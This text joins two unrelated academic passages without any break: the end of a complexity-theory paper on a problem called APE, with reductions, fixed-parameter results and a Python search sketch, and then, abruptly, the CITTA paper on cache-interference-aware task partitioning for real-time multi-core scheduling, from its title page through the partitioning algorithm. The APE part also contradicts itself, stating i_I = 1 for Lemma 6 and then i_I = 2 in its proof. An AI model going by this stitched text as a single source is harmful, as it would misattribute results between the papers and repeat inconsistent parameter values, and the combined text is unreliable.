Proof (sketch): Modify the instance of APE constructed in Lemma 4 as follows: (1) Replace all \(|V|\) transitions in each identical agent with a transition-tree rooted at \( q_0 \) consisting of a \(|V|\)-length “spine” of transitions, each of which is enabled by a move-fact, with \(|V|\) branches off this spine, where each branch is a \(|V|\)-length chain of transitions that is initially enabled by item \( v_i \) and delivers (one at a time) the vertex-facts corresponding to the neighbourhood of \( v_i \) before terminating at \( q_1 \); (2) Replace the single transition in the final agent with a \(|V|\)-length chain of transitions that are enabled by the individual vertex-facts for \( G \) before terminating in \( q_1 \) with the final exchange of the completion-fact; (3) Make the move-fact the initial fact-set for the player; and (4) Set \( t = (k \times 2|V|) + |V| = (2k+1)|V| \). The proof of correctness is a modification of that given in Lemma 4. Note that in the instance of APE described above, \( i_A = i_I = f_G = 1, f_I = |I| = 2, i_G = 0, \) and \( |A| = k + 1 \).

Lemma 6: CLIQUE polynomial-time many-one reduces to APE such that in the constructed instance of APE, \( i_A = i_I = 1, i_G = 0, f_G = 1, \) and \( |A|, f_P, \) and \( t \) are all functions of \( k \) in the given instance of CLIQUE.

Proof: Given an instance \((G = (V, E), k)\) of CLIQUE, construct an instance of APE consisting of two groups of \( k \) and \( k(k - 1)/2 \) agents, respectively. The agents in the first group are the vertex-selection agents from Lemma 4 modified so that agent \( i \) exchanges vertex-item \( v \) for vertex-position fact \( v/i \).
Each of the agents in the second group corresponds to a distinct pair \( i, j \), \( 1 \leq i < j \leq k \), and checks whether the vertices selected in positions \( i \) and \( j \) have an edge between them in \( G \). For the \( l \)th such pair, \( 1 \leq l \leq k(k - 1)/2 \), this is done using two states \( q_0 \) and \( q_1 \) and \( 2|E| \) transitions between \( q_0 \) and \( q_1 \) which, for each edge \((u, v) \in E\), trade items \( u/i, v/j \) (\( v/i, u/j \)) and fact \( echk_{l-1} \) for items \( u/i, v/j \) (\( v/i, u/j \)) and fact \( echk_l \), respectively. Each vertex-selection agent \( i \) starts with no items and the entire vertex/position-\( i \) fact-set, each edge-check agent \( l \) starts with no items and edge-check fact \( echk_l \), and the player starts with the entire vertex-item-set for \( G \) and edge-check fact \( echk_0 \). Finally, the goal is \( echk_{k(k-1)/2} \) and \( t = k + k(k - 1)/2 \). Note that the instance of APE described above can be constructed in time polynomial in the size of the given instance of CLIQUE. If there is a clique of size \( k \) in the given instance of CLIQUE, the player can exchange the vertices in that clique with the vertex/position agents in any order to obtain a “sequence” of vertex/position facts that will satisfy the edge-check agents and hence achieve the goal. Conversely, as the player can interact with each of the vertex/position agents at most once to trade a vertex-item for its associated vertex/position fact, any set of at most \( k + k(k - 1)/2 \) interactions between the player and the agents that achieves the goal in the constructed instance of APE must correspond to a set of \( k \) vertices that form a clique in \( G \). To complete the proof, note that in the constructed instance of APE, \( i_A = 1, i_I = f_I = 2, i_G = 0, f_G = 1 \), and \( |A| = k + k(k - 1)/2, f_P = k(k - 1)/2 + 1, t = k + k(k - 1)/2 \).
Lemma 7: CLIQUE polynomial-time many-one reduces to APE such that in the constructed instance of APE, \( |A| = 1, i_A = 1, i_I = f_I = 2, i_G = 0, f_G = 1 \), and \( |Q|, f_P, t \) are all functions of \( k \) in the given instance of CLIQUE.

Proof (sketch): Note that all of the agents in the reduction in Lemma 6 can be chained together in a single agent consisting of a chain of \( 1 + k + k(k - 1)/2 \) states, and that all edge-check facts except the last can be eliminated as they are no longer necessary, e.g., the state \( q_1 \) for what was originally the \( k(k - 1)/2 \)-th edge-check agent can only be reached if all other edge-checks are satisfied. The goal and value of \( t \) are unchanged. The proof of correctness of this reduction is a modification of that given in Lemma 6. Note that in the instance of APE described above, \( |A| = 1, i_A = 1, i_I = f_I = 2, i_G = 0, f_G = 1 \), \( |Q| = 1 + k + k(k - 1)/2, f_P = k \), and \( t = k + k(k - 1)/2 \). Observe that setting \( t \) to any specified value is actually unnecessary for the reductions in Lemmas 3–7 to work.

Result A: APE is NP-hard when \( |A| = 1 \).
Proof: Follows from the NP-hardness of CLIQUE and the reduction in Lemma 7.

Result B: APE is fp-intractable for the parameter-set \( \{i_A, f_A, i_I, |Q|, |I|, i_P, i_G, f_G\} \).
Proof: Follows from the \( W[1] \)-hardness of NTMC for parameter-set \( \{k\} \) [26] and the reduction from NTMC to APE given in Lemma 3.

Result C: APE is fp-intractable for the parameter-set \( \{|A|, i_A, i_I, f_I, t, i_G, f_G\} \).
Proof: Follows from the \( W[1] \)-hardness of DOMINATING SET for parameter-set \( \{k\} \) [9] and the reduction from DOMINATING SET to APE given in Lemma 4.

Result D: APE is fp-intractable for the parameter-set \( \{|A|, i_A, i_I, f_I, |I|, i_G, f_G\} \).
Proof: Follows from the \( W[1] \)-hardness of DOMINATING SET for parameter-set \( \{k\} \) [9] and the reduction from DOMINATING SET to APE given in Lemma 5.

Result E: APE is fp-intractable for the parameter-set \( \{|A|, i_A, i_I, f_I, f_P, t, i_G, f_G\} \).
Proof: Follows from the \( W[1] \)-hardness of CLIQUE for parameter-set \( \{k\} \) [9] and the reduction from CLIQUE to APE given in Lemma 6.

Result F: APE is fp-intractable for the parameter-set \( \{|A|, i_I, f_I, |Q|, f_P, t, i_G, f_G\} \).
Proof: Follows from the \( W[1] \)-hardness of CLIQUE for parameter-set \( \{k\} \) [9] and the reduction from CLIQUE to APE given in Lemma 7.

Result G: APE is fp-tractable for the parameter-set \( \{|A|, |I|, t\} \).
Proof: Consider the game-space search tree whose nodes encode the current item- and fact-sets of each agent and the player as well as the current state of each agent. Observe that there are at most \( |A| \times |I| \) possibilities for interaction relative to each node (as each agent's current state has at most \( |I| \) enabled transitions outwards from that state). As we require that the goal be reachable within \( t \) agent-player interactions, the tree has at most \( (|A| \times |I|)^t \) nodes that must be considered. As each node can be generated and evaluated in time polynomial in the size of the given instance of APE, the above is an algorithm for APE whose runtime is fp-tractable for parameter-set \( \{|A|, |I|, t\} \).
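The depth-bounded search behind Result G can be sketched directly. The following Python fragment uses a deliberately simplified agent model (our own encoding: every agent starts in state 0, and a transition is a tuple of required facts, required items, successor state, returned facts, and returned items); it illustrates the exhaustive game-space search, not the paper's implementation:

```python
def ape_search(agents, start_facts, start_items, goal, t):
    """Decide whether `goal` (a set of facts) is reachable within t
    agent-player interactions by exploring the game-space search tree.
    `agents` maps an agent name to {state: [(need_facts, need_items,
    next_state, give_facts, give_items), ...]}.  Each node has at most
    |A| * |I| children, so at most (|A| * |I|)^t nodes are visited,
    matching the fixed-parameter bound for {|A|, |I|, t}."""
    def explore(states, facts, items, depth):
        if goal <= facts:            # all goal facts obtained
            return True
        if depth == t:               # interaction budget spent
            return False
        for name, state in states.items():
            for need_f, need_i, nxt, give_f, give_i in agents[name].get(state, []):
                if need_f <= facts and need_i <= items:  # transition enabled
                    new_states = dict(states, **{name: nxt})
                    if explore(new_states, facts | give_f,
                               (items - need_i) | give_i, depth + 1):
                        return True
        return False

    return explore({name: 0 for name in agents},
                   set(start_facts), set(start_items), 0)
```

For instance, a single "wizard" agent that trades the amulet for the fact `knows_wizard` makes that goal reachable with `t = 1` but not with `t = 0`.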
CITTA: Cache Interference-Aware Task Partitioning for Real-Time Multi-core Systems
Xiao, J.; Pimentel, A.D.
DOI: 10.1145/3372799.3394367
Publication date: 2020
Document Version: Final published version
Published in: LCTES '20
License: Article 25fa Dutch Copyright Act
Citation for published version (APA):

CITTA: Cache Interference-aware Task Partitioning for Real-time Multi-core Systems
Jun Xiao, University of Amsterdam, Amsterdam, Netherlands, J.Xiao@uva.nl
Andy D. Pimentel, University of Amsterdam, Amsterdam, Netherlands, A.D.Pimentel@uva.nl

Abstract: Shared caches in multi-core processors introduce serious difficulties in providing guarantees on the real-time properties of embedded software due to the interaction and the resulting contention in the shared caches. Prior work has studied the schedulability analysis of global scheduling for real-time multi-core systems with shared caches. This paper considers another common scheduling paradigm: partitioned scheduling in the presence of shared cache interference. To achieve this, we propose CITTA, a cache-interference aware task partitioning algorithm. An integer programming formulation is constructed to calculate the upper bound on cache interference exhibited by a task, which is required by CITTA. We conduct schedulability analysis of CITTA and formally prove its correctness. A set of experiments is performed to evaluate the schedulability performance of CITTA against global EDF scheduling over randomly generated tasksets. Our empirical evaluations show that CITTA outperforms global EDF scheduling in terms of task sets deemed schedulable.

CCS Concepts: • Computer systems organization → Embedded software.
Keywords: Shared caches, Partitioned scheduling, Schedulability analysis, Real-time systems
ACM Reference Format:

1 Introduction and Motivation

Caches are common on multi-core systems as they can efficiently bridge the performance gap between memory and processor speeds.
The last-level caches are usually shared by cores to improve utilization. However, this brings major difficulties in providing guarantees on real-time properties of embedded software due to the interaction and the resulting contention in a shared cache. On a multi-core processor with shared caches, a real-time task may suffer from two different kinds of cache interferences [21], which severely degrade the timing predictability of multi-core systems. The first is called intra-core cache interference, which occurs within a core, when a task is preempted and its data is evicted from the cache by other real-time tasks. The second is inter-core cache interference, which happens when tasks executing on different cores access the shared cache simultaneously. In this work, we consider non-preemptive task systems, which means that intra-core cache interference is avoided since no preemption is possible during task execution. We therefore focus on inter-core cache interference. It is necessary to conduct schedulability analysis when designing hard real-time application systems executing on multi-core platforms with shared caches, as those systems cannot afford to miss deadlines and hence demand timing predictability. Any schedulability analysis requires knowledge about the Worst-Case Execution Time (WCET) of real-time tasks. However, as pointed out in [28], it is extremely difficult to predict the cache behavior to accurately obtain the WCET of a real-time task considering cache interference since different cache behaviors (cache hit or miss) will result in different execution times of each instruction. In this paper, we assume that a task’s WCET itself does not account for shared cache interference but, instead, we determine this interference explicitly (as will be explained later on). Hardy and Puaut [18] present such an approach to derive a task’s WCET without considering shared cache interference. 
On multi-core systems, two paradigms are widely used for scheduling real-time tasks: global and partitioned (or semi-partitioned) scheduling. In global scheduling, a job is allowed to execute on any core. In partitioned scheduling, on the other hand, tasks are statically allocated to processor cores, i.e., each task is assigned to a core and is always executed on that particular core. Although partitioned approaches cannot exploit all unused processing capacity, since a bin-packing-like problem needs to be solved to assign tasks to cores, they offer lower runtime overheads and provide consistently good empirical performance at high utilizations [6]. Furthermore, taking shared cache interference into account, partitioned approaches can achieve better schedulability than global scheduling. We provide a simple example to illustrate this. Consider three tasks $\tau_1$, $\tau_2$ and $\tau_3$ with the same period and relative deadline of 7; the WCETs of $\tau_1$, $\tau_2$ and $\tau_3$ are 3, 3 and 2, respectively. The execution platform is a processor with 2 cores and a last-level shared cache. If $\tau_1$ and $\tau_2$ run concurrently, we assume that the maximum cache interference exhibited by $\tau_1$ and $\tau_2$ is 3. We also assume that $\tau_3$ has no cache interference with $\tau_1$ and $\tau_2$. One cannot conclude that this taskset is schedulable under global scheduling. Figure 1 shows a case where $\tau_3$ misses its deadline. At time $t = 0$, tasks $\tau_1$ and $\tau_2$ are scheduled to execute on the two cores. In the figure, the black area of a cumulative length of 3 denotes the WCET, and the hatched area of a cumulative length of 3 represents the extra execution time due to the cache interference. At $t = 6$, $\tau_1$ and $\tau_2$ both finish their executions, after which $\tau_3$ starts its execution. At $t = 7$, $\tau_3$ misses its deadline.
Similarly, consider another case: at $t = 0$, $\tau_3$ and $\tau_1$ (or $\tau_2$) are scheduled; at $t = 2$, $\tau_3$ finishes and $\tau_2$ (or $\tau_1$) starts its execution. Since cache interference is counted per job [31], in the worst case the cache interference exhibited by $\tau_2$ (or $\tau_1$) can still be 3, even though the duration of co-running $\tau_2$ (or $\tau_1$) and $\tau_1$ (or $\tau_2$) is shorter than in the previous case. Due to the cache interference, $\tau_2$ (or $\tau_1$) could finish its execution at $t = 8$, leading to a deadline miss for $\tau_2$ (or $\tau_1$).

Figure 1. Case where $\tau_3$ misses its deadline if $\tau_1$, $\tau_2$ and $\tau_3$ are scheduled globally.

However, the taskset is schedulable under partitioned scheduling. Consider, e.g., the partitioning scheme in which $\tau_1$ and $\tau_2$ are assigned to core 1 and task $\tau_3$ is assigned to core 2. Since $\tau_1$ and $\tau_2$ are assigned to the same core, they cannot run simultaneously. As no cache interference can occur during task execution, it can be verified that every task meets its deadline.

**Contributions.** Motivated by the above example, in this work we propose a novel cache interference-aware task partitioning algorithm, called CITTA. To the best of our knowledge, this is the first work on partitioned scheduling for real-time multi-core systems that accounts for shared cache interference. An integer programming formulation is constructed to calculate the upper bound on cache interference exhibited by a task, which is required by CITTA. We conduct schedulability analysis of CITTA and formally prove its correctness. A set of experiments is performed to evaluate the schedulability performance of CITTA against global EDF scheduling over randomly generated tasksets. Our empirical evaluations show that CITTA outperforms global EDF scheduling in terms of tasksets deemed schedulable. The rest of the paper is organized as follows.
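The feasibility of the partitioned scheme in this example reduces to a one-line check: with a common period and deadline and non-preemptive execution, the tasks assigned to a core simply run back to back, and no cache interference arises because co-partitioned tasks never overlap. A small sketch (our own illustration of the example, not the paper's schedulability test):

```python
def core_feasible(wcets, deadline):
    """Same-period non-preemptive tasks on one core execute sequentially,
    so the last task finishes at sum(wcets); the core is feasible iff that
    meets the common deadline (no interference: co-partitioned tasks
    never run concurrently)."""
    return sum(wcets) <= deadline

# Example partitioning: core 1 runs tau1, tau2 (WCETs 3, 3);
# core 2 runs tau3 (WCET 2); common deadline 7.
assert core_feasible([3, 3], 7)   # tau1 in [0,3), tau2 in [3,6) -- both meet 7
assert core_feasible([2], 7)      # tau3 in [0,2)
assert not core_feasible([3, 3, 2], 7)  # all three on one core would miss
```

This is exactly why the partitioning $\{\tau_1, \tau_2\}$ / $\{\tau_3\}$ works: serializing the two interfering tasks removes the interference term entirely.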
Section 2 gives an overview of related work. The system model and some other prerequisites for this paper are described in Section 3. Section 4 describes the proposed CITTA, where we also detail the computation of the inter-core cache interference and the schedulability analysis of CITTA. Section 5 presents the experimental results, after which Section 6 concludes the paper.

## 2 Related work

**WCET estimation.** For hard real-time systems, it is essential to obtain each real-time task's WCET, which provides the basis for the schedulability analysis. WCET analysis has been actively investigated in the last two decades; an excellent overview can be found in [30]. There are well-developed techniques to estimate a real-time task's WCET for single-processor systems. Unfortunately, the existing techniques for single-processor platforms are not applicable to multi-core systems with shared caches. Only a few methods have been developed to estimate task WCETs for multi-core systems with shared caches [17, 23, 36]. In almost all those works, due to the assumption that cache interferences can occur at any program point, WCET analysis will be extremely pessimistic, especially when the system contains many cores and tasks. An overestimated WCET is not useful, as it degrades system schedulability.

**Shared cache interference.** Since shared caches make it difficult to accurately estimate the WCET of tasks, many researchers have recognized and studied the problem of cache interference in order to use shared caches in a predictable manner. Cache partitioning is a successful and widely-used approach to address contention for shared caches in (real-time) multi-core applications. There are two cache partitioning methods: software-based and hardware-based techniques [15]. The most common software-based cache partitioning technique is page coloring [24, 29].
By exploiting the virtual-to-physical page address translations present in virtual memory systems at OS-level, page addresses are mapped to pre-defined cache regions to avoid the overlap of cache spaces. Hardware-based cache partitioning is achieved using a cache locking mechanism [9, 26, 28], which prevents cache lines from being evicted during program execution. The main drawback of cache locking is that it requires additional hardware support that is not available in many commercial processors for embedded systems. A few works address schedulability analysis for multi-core systems with shared caches [16, 34], but these works use cache space isolation techniques to avoid cache contention for hard real-time tasks. In this work, we do not deploy any cache partitioning techniques to mitigate the inter-core cache interference. Instead, we address the problem of task partitioning in the presence of shared cache interference. **Real-time Scheduling.** To schedule real-time tasks on multi-core platforms, different paradigms have been widely studied: partitioned [4, 13, 35], global [3, 7, 22], and semi-partitioned scheduling [8, 10, 20]. A comprehensive survey of real-time scheduling for multiprocessor systems can be found in [12]. Most multi-core scheduling approaches assume that the WCETs are estimated in an offline and isolated manner and that WCET values are fixed. Real-time scheduling for multi-core systems using cache partitioning techniques is done via two steps: it first captures the relationship between the task’s WCET and cache allocation by analysis or measurement as the WCET of a task depends on the number of cache partitions assigned to that task, and then develops a strategy that determines the number of cache partitions assigned to each task in the system, so that the task system is schedulable. Existing approaches typically adopt Mixed Integer Programming to find the optimal cache assignment. 
However, these methods incur a very high execution time complexity and are therefore too inefficient to be practical [33]. Different from the above approaches based on cache partitioning techniques, we address the problem of task partitioning in the presence of shared cache interference. Our approach neither requires operating system modifications for page coloring nor hardware features for cache locking, which are not supported by most existing embedded processors. The most relevant to our work is [31, 32], which also addresses schedulability analysis for multi-core systems with shared caches. However, the work of [31, 32] only considers global scheduling. In this paper, we consider another scheduling paradigm, namely partitioned scheduling, and propose CITTA, a cache interference-aware task partitioning algorithm. Our empirical evaluations show that CITTA outperforms global EDF scheduling in terms of tasksets deemed schedulable.

## 3 System Model and Prerequisites

### 3.1 System Model

**Task Model.** A taskset \( \tau \) comprises \( n \) periodic or sporadic real-time tasks \( \tau_1, \tau_2, ... \tau_n \). Each task \( \tau_k = (C_k, D_k, T_k) \in \tau \) is characterized by a worst-case computation time \( C_k \), a period or minimum inter-arrival time \( T_k \), and a relative deadline \( D_k \). All tasks are considered to be deadline constrained, i.e. the relative deadline of a task is less than or equal to its period: \( D_k \leq T_k \). We further assume that all tasks are independent, i.e. they have no shared variables, no precedence constraints, and so on. A task \( \tau_k \) is a sequence of jobs \( J_k^j \), where \( j \) is the job index. We denote the arrival time, starting time, finishing time and absolute deadline of job \( J_k^j \) as \( r_k^j, s_k^j, f_k^j \) and \( d_k^j \), respectively.
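The task model can be captured in a few lines of code; the following is a minimal sketch (the class and function names are illustrative, not from the paper, and the constraint \( C_k \leq D_k \) is added as a basic feasibility assumption):

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Task:
    """Sporadic task tau_k = (C_k, D_k, T_k); all values in integer clock ticks."""
    C: int  # worst-case computation time C_k, measured in isolation
    D: int  # relative deadline D_k
    T: int  # period / minimum inter-arrival time T_k

    def __post_init__(self):
        # Constrained deadlines: C_k <= D_k <= T_k.
        assert 0 < self.C <= self.D <= self.T

def absolute_deadline(task: Task, release: int) -> int:
    """Absolute deadline of a job released at time `release`: d = r + D."""
    return release + task.D
```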
Note that the goal of a real-time scheduling algorithm is to guarantee that each job completes before its absolute deadline: \( f_k^j \leq d_k^j = r_k^j + D_k \). As explained, it is difficult to accurately estimate \( C_k \) considering the cache interference of other tasks executing concurrently. It should be pointed out that \( C_k \) in this paper refers to the WCET of \( \tau_k \) assuming \( \tau_k \) is the only task executing on the multi-core processor platform, i.e. cache interference delays are not included in \( C_k \). Since time measurement cannot be more precise than one tick of the system clock, all timing parameters and variables in this paper are assumed to be non-negative integer values. Our system architecture consists of a multi-core processor with \( m \) identical cores onto which the individual tasks are scheduled. In multi-core processors, caches are organized as a hierarchy of multiple cache levels to address the trade-off between cache latency and hit rate. The lower-level caches, for example L1, are private, while the last-level cache (LLC) is shared among all cores. The caches are assumed to be non-inclusive and direct-mapped.

**Partitioned Non-preemptive Schedulers.** In this paper, we focus on non-preemptive partitioned scheduling. Once a task instance starts execution, preemption is not allowed, so it runs to completion. Consequently, we do not have to consider intra-core cache interference; unless explicitly stated otherwise, cache interference refers to inter-core cache interference in the following discussion. Since partitioning tasks among the cores reduces the multi-core processor scheduling problem to a set of single-core scheduling problems (one for each core), the optimality without inserted idle time [14, 19] of non-preemptive EDF (EDF$_{np}$) makes it a reasonable algorithm to use as the run-time scheduler on each core.
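The dispatch rule of non-preemptive EDF is simple to state in code; a sketch (the job representation is a hypothetical choice for illustration):

```python
def edf_np_pick(ready_jobs):
    """Non-preemptive EDF dispatch: when the core becomes free, start the
    ready job with the earliest absolute deadline; it then runs to completion.

    ready_jobs: list of (absolute_deadline, job_id) pairs.
    """
    if not ready_jobs:
        return None  # the core idles only when nothing is ready (work-conserving)
    return min(ready_jobs, key=lambda job: job[0])
```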
Therefore, we make the assumption that each core, and the tasks assigned to it by the partitioning algorithm, are scheduled at run time by an EDF$_{np}$ scheduler. EDF$_{np}$ assigns a priority to a job according to the absolute deadline of that job: a job with an earlier absolute deadline has higher priority than jobs with a later absolute deadline. EDF$_{np}$ scheduling is work-conserving: under EDF$_{np}$, no core idles while a ready task is waiting for execution.

### 3.2 The Demand-Bound Function

A successful approach to analyzing the schedulability of real-time tasks is to use a demand bound function [5]. The demand bound function DBF($\tau_i$, $t$) is the largest possible cumulative execution demand of all jobs that can be generated by $\tau_i$ such that both their arrival times and their deadlines lie within any time interval of length $t$. Let $t_0$ be the starting time of a time interval of length $t$; the cumulative execution demand of $\tau_i$'s jobs over $[t_0, t_0 + t]$ is maximized if one job arrives at $t_0$ and subsequent jobs arrive as soon as permitted, i.e. at instants $t_0 + T_i, t_0 + 2T_i, t_0 + 3T_i, \ldots$ Therefore, DBF($\tau_i$, $t$) can be computed by Equation (0.1):

$$DBF(\tau_i, t) = \max\left(0, \left(\left\lfloor\frac{t-D_i}{T_i}\right\rfloor + 1\right) \times C_i\right). \quad (0.1)$$

[1] proposed a technique for approximating DBF($\tau_i$, $t$). The approximated demand bound function DBF*($\tau_i$, $t$) is given by the following equation:

$$DBF^*(\tau_i, t) = \begin{cases} 0 & t < D_i \\ C_i + U_i \times (t - D_i) & \text{otherwise} \end{cases} \quad (0.2)$$

where $U_i = \frac{C_i}{T_i}$. Observe that the following inequality holds for all $\tau_i$ and all $t \geq 0$:

$$DBF^*(\tau_i, t) \geq DBF(\tau_i, t) \quad (0.3)$$

### 3.3 Uniprocessor Schedulability

The schedulability analysis of uniprocessor scheduling is well studied.
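Before turning to the uniprocessor test, note that Equations (0.1) and (0.2) translate directly into code; a sketch assuming integer time values:

```python
def dbf(C: int, D: int, T: int, t: int) -> int:
    """Demand bound function, Equation (0.1); // is integer floor division."""
    return max(0, ((t - D) // T + 1) * C)

def dbf_star(C: int, D: int, T: int, t: int) -> float:
    """Approximated demand bound function DBF*, Equation (0.2)."""
    return 0 if t < D else C + (C / T) * (t - D)
```

A quick check over a range of `t` confirms Inequality (0.3), i.e. `dbf_star` upper-bounds `dbf` everywhere.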
[2] presented a necessary and sufficient condition for the feasibility test of a sporadic task system $\tau$ scheduled by EDF$_{np}$ on a uniprocessor platform.

**Theorem 1.** A taskset $\tau$ is schedulable under EDF$_{np}$ on a uniprocessor platform if and only if

$$\forall t, \quad \sum_{i=1}^{n} DBF(\tau_i, t) \leq t \quad (1.1)$$

and for all $\tau_j \in \tau$:

$$\forall t : C_j \leq t \leq D_j : \quad C_j + \sum_{i=1, i \neq j}^{n} DBF(\tau_i, t) \leq t. \quad (1.2)$$

Note that the computation of DBF($\tau_i$, $t$) and DBF*($\tau_i$, $t$) by Equations (0.1) and (0.2) and the two schedulability test conditions (1.1) and (1.2) do not account for shared cache interference. We will extend the computation of DBF($\tau_i$, $t$) and DBF*($\tau_i$, $t$) and the two schedulability conditions to the case where shared cache interference is considered.

### 3.4 Cache Interference

The WCET of a task can be obtained by performing a Cache Access Classification (CAC) and Cache Hit/Miss Classification (CHMC) analysis for each memory access, at the private caches and the shared LLC separately [30]. The CAC categorizes the accesses to a certain cache level as Always (A), Uncertain (U) or Never (N). CHMC classifies the references to a memory block as Always Hit (AH), Always Miss (AM) or Uncertain (U). As the LLC is shared by multiple cores, running tasks compete with each other for the shared cache space. As a consequence, tasks may replace cache blocks that belong to other tasks, causing shared cache interference. Let $\tau_k$ be the interfered and $\tau_i$ the interfering task. We use $I^c_{i,k}$ to represent the upper bound on the shared cache interference imposed on $\tau_k$ by one job execution of $\tau_i$. $I^c_{i,k}$ can be calculated, as indicated by Lemma 4 and its proof in [31], using the concept of Hit Block (HB), i.e. a memory block whose access is classified as AH at the shared cache, and Conflicting Block (CB), i.e.
a memory block whose access is classified as A or U at the shared cache. By counting the accesses to each of $\tau_k$'s HBs and the accesses to each of $\tau_i$'s CBs, $I^c_{i,k}$ can be derived by bounding the conflicting accesses to each shared cache set between $\tau_k$ and $\tau_i$. In the following discussion, we assume $I^c_{i,k}$ is known.

## 4 Cache Interference-Aware Task Partitioning: CITTA

Given a taskset $\tau$ comprised of $n$ periodic or sporadic tasks and a processing platform $\pi$ with $m$ identical cores $\pi = \{\pi_1, \pi_2, \ldots, \pi_m\}$, a partitioning algorithm decides how to assign tasks to cores so as to avoid task deadline misses. The problem of assigning a set of tasks to a set of cores is analogous to the bin-packing problem: the tasks are the objects to pack and the cores are the bins. The bin-packing problem is known to be NP-hard in the strong sense. Thus, searching for an optimal task assignment is not practical. [25] and [13] studied several bin-packing heuristics for the preemptive and non-preemptive task model. Each of these bin-packing heuristics typically follows the same pattern: the tasks of the task system are first sorted by some criterion, after which the tasks are assigned, in order, to a core that satisfies a sufficient condition. Let $\tau(\pi_x)$ denote the set of tasks assigned to processor core $\pi_x$, where $1 \leq x \leq m$; $\tau_i \in \tau(\pi_x)$ means that $\tau_i$ is assigned to core $\pi_x$. If taskset $\tau$ can be scheduled by a partitioned algorithm, the outcome of running a partitioning algorithm is a task partition such that:

- All tasks are assigned to processor cores:
$$\cup_{1 \leq x \leq m} \tau(\pi_x) = \tau$$
- Each task is assigned to only one core:
$$\forall y \neq x, 1 \leq y \leq m, 1 \leq x \leq m, \quad \tau(\pi_y) \cap \tau(\pi_x) = \emptyset$$

In Section 4.1, we describe our cache interference-aware task partitioning algorithm: CITTA.
Section 4.2 derives the calculation of the upper bound on the shared cache interference. Section 4.3 conducts the schedulability analysis for CITTA. Before describing CITTA, we first extend the DBF to account for shared cache interference. Due to the extra execution delay caused by shared cache interference, a task $\tau_i$ may execute longer than $C_i$. Given a task partitioning scheme, one can compute the upper bound on the cache interference exhibited by task $\tau_i$, denoted as $I^c_i$; we will show how to compute $I^c_i$ later. In a multiprogrammed environment, the actual execution time of $\tau_i$, including cache interference, can be bounded by $C_i + I^c_i$. We denote by $DBF^c(\tau_i, t)$ the demand bound function that accounts for cache interference. $DBF^c(\tau_i, t)$ can be computed by extending Equation (0.1):

$$DBF^c(\tau_i, t) = \max\left(0, \left(\left\lfloor\frac{t - D_i}{T_i}\right\rfloor + 1\right) \times (C_i + I^c_i)\right). \quad (1.3)$$

Similarly, the approximated demand bound function $DBF^{c*}(\tau_i, t)$ is given by the following equation, extending Equation (0.2):

$$DBF^{c*}(\tau_i, t) = \begin{cases} 0 & t < D_i \\ C_i + I^c_i + U^c_i \times (t - D_i) & \text{otherwise} \end{cases} \quad (1.4)$$

where $U^c_i = \frac{C_i + I^c_i}{T_i}$. It can also be observed that:

$$DBF^{c*}(\tau_i, t) \geq DBF^c(\tau_i, t) \quad (1.5)$$

### 4.1 The Task Partitioning Algorithm: CITTA

We now propose CITTA, a task partitioning algorithm taking shared cache interference into account. We assume the tasks are sorted in non-decreasing order by means of a certain criterion. For example, if a task's relative deadline is chosen as the criterion, then $D_i \leq D_{i+1}$ for $1 \leq i \leq n$. More criteria for sorting the tasks will be discussed in Section 5. CITTA performs the following steps:

**step 1:** for each task $\tau_i \in \tau$:

1. Attempt to assign $\tau_i$ to a core $\pi_x$ (starting from $\pi_1$).
2. Calculate the upper bound on cache interference $I^c_k$ for each $\tau_k \in \tau(\pi_x) \cup \{\tau_i\}$, i.e.
tasks that are already assigned to $\pi_x$ and $\tau_i$ itself, assuming $\tau_i$ is assigned to $\pi_x$. We will show the calculation procedure in the next subsection.
3. Check whether the following condition holds for each $\tau_k \in \tau(\pi_x) \cup \{\tau_i\}$:

$$D_k \geq \sum_{\tau_j \in \tau(\pi_x) \cup \{\tau_i\}, D_j \leq D_k} DBF^{c*}(\tau_j, D_k) + \max_{\tau_l \in \tau(\pi_x) \cup \{\tau_i\}, D_l > D_k} (C_l + I^c_l). \quad (1.6)$$

   a. If no $\tau_k$ violates condition (1.6), the attempt is admitted and $\tau_i$ is added to $\pi_x$.
   b. If condition (1.6) is violated by at least one $\tau_k$, the attempt is rejected. We then attempt to assign $\tau_i$ to the next core $\pi_{x+1}$ and repeat steps (2) and (3). If every core rejects $\tau_i$, it is added to the set of temporarily non-allocable tasks $\tau^{tna}$.

**step 2:** after performing step 1, the resulting set $\tau^{tna}$ is either empty or non-empty.

(a) If $\tau^{tna} = \emptyset$, which means all tasks have been allocated to cores, CITTA returns Success.

(b) Otherwise, we apply step 1 to each $\tau_i \in \tau^{tna}$; $\tau_i$ is removed from $\tau^{tna}$ if it can be assigned to a core. We repeatedly apply step 1 to the tasks in $\tau^{tna}$ until $\tau^{tna}$ becomes empty or no more tasks in $\tau^{tna}$ can be allocated to cores. If $\tau^{tna} = \emptyset$ at the end, CITTA returns Success; otherwise CITTA returns Fail: it is unable to determine whether scheduling $\tau$ is feasible on the multi-core platform.

We briefly explain the rationale behind condition (1.6). Given a task $\tau_k$, the execution demand of tasks (including $\tau_k$) with a relative deadline no larger than $D_k$ is captured by the first term on the right-hand side of condition (1.6). Since we consider a non-preemptive task system, the second term accounts for the blocking time due to the execution of a task with a larger relative deadline than $\tau_k$ at the time a job of $\tau_k$ arrives.
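In code, the check of condition (1.6) for one task against the candidate contents of a core can be sketched as follows (the per-task interference bounds `Ic` are assumed to be given, as they are computed separately):

```python
def fits(tasks, k, Ic):
    """Check condition (1.6) for tasks[k] against the other tasks of one core.

    tasks: list of (C, D, T) tuples -- the candidate contents of a single core.
    Ic:    list of interference upper bounds I^c_i, one per task (assumed given).
    """
    Ck, Dk, Tk = tasks[k]

    def dbf_c_star(i, t):  # DBF^{c*}: Equation (0.2) with C_i inflated by I^c_i
        C, D, T = tasks[i]
        return 0 if t < D else (C + Ic[i]) + (C + Ic[i]) / T * (t - D)

    # Demand of tasks with relative deadline no larger than D_k ...
    demand = sum(dbf_c_star(i, Dk)
                 for i, (_, D, _) in enumerate(tasks) if D <= Dk)
    # ... plus blocking by the largest longer-deadline job (non-preemptive).
    blocking = max((tasks[i][0] + Ic[i]
                    for i, (_, D, _) in enumerate(tasks) if D > Dk), default=0)
    return Dk >= demand + blocking
```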
